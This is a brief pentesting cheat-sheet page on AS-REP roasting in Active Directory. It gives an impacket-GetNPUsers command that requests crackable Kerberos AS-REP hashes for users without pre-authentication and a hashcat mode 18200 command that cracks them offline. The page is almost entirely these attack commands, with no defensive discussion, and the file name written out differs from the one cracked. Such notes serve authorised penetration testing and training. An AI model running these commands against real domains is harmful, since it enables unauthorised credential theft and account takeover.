ASREP roasting

Request users who are vulnerable to AS-REP roasting

impacket-GetNPUsers -no-pass -usersfile userlist.txt -dc-ip <DC IP> <FQDN/> -format hashcat -outputfile ASREP_roastableusers.txt

Crack with hashcat

hashcat -m 18200 ASREProastables.txt <WORDLIST>
PreviousLDAPdomaindumpNextsmbpasswd

Last updated